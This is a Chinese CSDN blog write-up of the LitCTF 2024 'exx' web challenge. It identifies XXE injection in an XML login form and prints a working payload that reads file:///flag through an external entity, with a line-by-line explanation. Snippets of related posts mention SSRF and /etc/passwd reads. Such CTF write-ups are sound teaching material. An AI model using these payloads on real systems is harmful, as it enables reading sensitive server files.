[LitCTF 2024]exx

最新推荐文章于 2024-08-20 10:02:48 发布
最新推荐文章于 2024-08-20 10:02:48 发布
阅读量365 收藏 5
点赞数 10
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80243833/article/details/141137114
版权

[LitCTF 2024]exx

点开之后页面如图所示:
在这里插入图片描述随便输入一个用户名试试:
在这里插入图片描述发现回显失败,我们点击鼠标右键查看页面源码:
在这里插入图片描述这里展示了如何使用jQuery发起AJAX请求,并处理XML格式的请求和响应。
而XXE注入的最明显特征包括:
1,数据泄露:允许攻击者读取服务器上的敏感文件。
2,服务器端请求伪造(SSRF):使攻击者能够发起服务器端的请求,访问内网服务。
3,拒绝服务(DoS):通过外部实体消耗服务器资源,导致服务不可用。
那么我们就可以确定是xxe注入了,接着我们构造payload:

<!DOCTYPE ANY [
    <!ENTITY XXE SYSTEM "file:///flag">
]>
<user><username>&XXE;</username><password>123456</password></user>

<!DOCTYPE ANY [
    <!ENTITY XXE SYSTEM "file:///flag">
]>

这段是文档类型定义(DTD),其中定义了一个名为 XXE 的外部实体,其值通过 SYSTEM 关键字从指定的文件系统路径(file:///flag)获取。

<user>
    <username>&XXE;</username>
    <password>123456</password>
</user>

在 username 标签内,通过 &XXE; 引用了之前定义的外部实体 XXE,试图获取指定文件的内容。

然后我们发送得到:
在这里插入图片描述得到本题flag.

Alpha first
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
EXX11901.zip
05-01
标题中的"EXX11901.zip"表明这是一个压缩文件,使用了ZIP格式进行打包。ZIP是一种常见的文件归档格式,它允许用户将多个文件和文件夹组合成一个单一的压缩包,以便于存储、传输和管理。这种格式通过数据压缩算法减少...
JAVA exx与exe转换器
07-07
双击后自动把目录下的所有exxW文件转换成EXE包括子目录里的,如果没有EXX则自动把exe转换成EXX
LitCTF2024WP
qq_67760645的博客
06-02 984
LitCTF2024的解题思路
LITCTF2024-6月web方向wp
Perterluck的博客
06-02 945
这个题目考察XXE注入,这个从题目就可看出来(翻转一下就可),了解一下XXE注入,主要了解XML格式和其中DOCTYPE还有主体ENTITY的定义,重点利用的是外部实体注入攻击,因为服务器会直接将xml传送的内容做引用,这样便可以通过一些伪协议找到flag。dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info:注意这个协议使用的前提是服务器的端口可以拿到,这个没啥好方法,除非直接告诉你否则就爆破吧。这个就是一个反序列化,没啥好说的,直接按照要求就可拿到flag。
探姬杯LitCTF2024Web方向)
Zue3r的博客
06-02 761
探姬杯LitCTF2024Web方向)
LitCTF 2024(公开赛道)部分 wp
焦虑的焦虑
06-04 1953
LitCTF 2024(公开赛道)部分 wp
LitCTF 2024(公开赛道)——WP
ASD830的博客
06-02 1866
目录Misc涐贪恋和伱、甾―⑺dé毎兮毎秒你说得对,但__盯帧珍珠Everywhere We Go关键,太关键了!女装照流量原铁,启动!舔到最后应有尽有The loveWebexx一个....池子?SAS - Serializing Authentication System浏览器也能套娃?高亮主题(划掉)背景查看器百万美元的诱惑Reverse编码喵Cryptocommon_primes题目只给了一张图片,zesteg秒了,flag:LitCTF{e8f7b267-9c45-4c0e-9d1e-13fc5b
LitCTF2024部分wp
oyf3085227433的博客
06-02 1204
又是被大佬带飞的一天
NSS [LitCTF 2024]exx
Jay17的博客
07-22 249
NSS [LitCTF 2024]exx
WebLitCTF 2024 题解(全)
uuzeray的博客
07-25 672
file:///flag直接读本地文件。参考ctfshow web57。访问./dollar.php。以xml形式传数据,打xxe。{{7*7}}测出SSTI。随便找个payload打了。随便试一试,一眼ssrf。目录穿越拿到flag。
LitCTF2024赛后web复现
2301_80913334的博客
07-29 705
用hackbar打开post传参一下theme=/etc/passwd发现有报错信息不能打开这个文件且现在的路径是themes//etc/p说明当前页面的路径是themes,可能存在漏洞。尝试输入http://127.0.0.1发现跳出一个相同页面,输入http://www.baidu.com发现跳转到了百度页面,这里我们可以想到可能是ssrf漏洞。既然有/etc/passwd这个目录存在且里面也没有发现flag的相关信息,尝试查看一下/flag目录存在不存在,直接得到flag。
exx-C-Repo:这是足迹
04-21
【标题】"exx-C-Repo:这是足迹" 暗示着这是一个关于软件开发的项目,可能是一个代码仓库,其中包含了"足迹"这一概念的实现。在IT领域,"足迹"可以指的是用户活动记录、浏览历史或者某种痕迹追踪功能。这个项目很可能...
Dell-Exx50-Hackintosh:适用于Latitude 2015型号的Hackintosh
03-20
戴尔Exx50 Hackintosh此存储库包含macOS Big Sur上Exx50的所有修复程序。我需要确认EFI是否在其他型号上工作,以便我完成我的清单。谢谢!我注意到我的E7250具有与其他Exx50型号几乎相同的规格,因此创建了此存储库...
NVR_78_79_EXX_V3.4.90_161008
12-12
程序包适用于以下型号: DS-7804/08/16N-E1、DS-7804N-E1/4N、DS-7804N-E1/4P、 DS-7808/16/32N-E2、DS-7808/16/32N-E2/8N、DS-7808/16/32N-E2/8P、 DS-7816/32N-E2/16N、DS-7816/32N-E2/16P、 ...
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 1044
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 620
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
2024年杭州市网络与信息安全管理员(网络安全管理员)职业技能竞赛的通知
Geek极安云科-致力于网络安全事业
08-16 606
竞赛由理论知识和操作技能两部分组成,均采用百分制,小数点后保留两位,60分(含)以上为合格。荣获竞赛一等奖、二等奖的选手,由杭州市人力社保局认定为“杭州市技术能手”,若有不符合认定条件的选手,不再递补;本次竞赛依据《网络与信息安全管理员(网络安全管理员)国家职业技能标准》三级(高级工)等级要求确定技术标准,编制技术文件和命题,适当增加相关新知识、新技术、新技能等内容。1.各区、县(市),有关产业工会,要高度重视此次竞赛,积极发动、广泛宣传、认真组织、严格选拔,推荐综合素质较好、技能水平较高的人员参赛。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
08-20 208
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
:1用丙纶纱仿造18.21exX18.21ex,311根/10cmX307根/10cm 棉细纺织物,要求保持原来的外观风格,若密度不变,则丙纶纱 作业: 的线密度应为多少?若纱线的线密度不变,则丙纶纱经纬密度应 为多少?(若丙纶直径系数为0.049)
04-26
根据题目所给的数据,棉细纺织物的经线密度为311根/10cm,纬线密度为307根/10cm,以及线密度为18.21ex,即18.21根/厘米。 首先需要计算出棉细纺织物的经纬线线密度:(311 + 307)/ 2 = 309根/10cm 由于丙纶纱的直径系数为0.049,因此其线密度为: 18.21ex / 0.049 = 371.22根/厘米 将其转化为根/10cm,即: 371.22 * 10 = 3712.2根/10cm 因此,丙纶纱的线密度应为3712.2根/10cm。 若丙纶纱的线密度不变,则其经纬线密度应为: 3712.2 / 309 = 12根/厘米 因此,丙纶纱的经纬密度均应为12根/厘米。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值